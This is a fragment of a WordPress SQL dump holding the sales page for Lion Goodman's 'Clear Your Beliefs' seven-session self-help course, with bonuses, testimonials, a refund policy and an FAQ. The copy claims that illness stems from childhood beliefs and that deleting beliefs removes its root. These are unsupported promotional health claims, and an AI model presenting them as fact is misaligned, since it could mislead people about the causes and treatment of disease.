begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<p><strong> In Session 1, you will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n<p>	<strong>=&gt; <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<strong>=&gt; <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n<strong>=&gt; <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n<strong>=&gt; <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n<strong>=&gt; <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n<strong>=&gt; <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>=&gt; <em>Professional Coaching Sessions:</strong> </em> Optional.</p>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-07-08 09:10:39', '2015-07-08 14:10:39', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
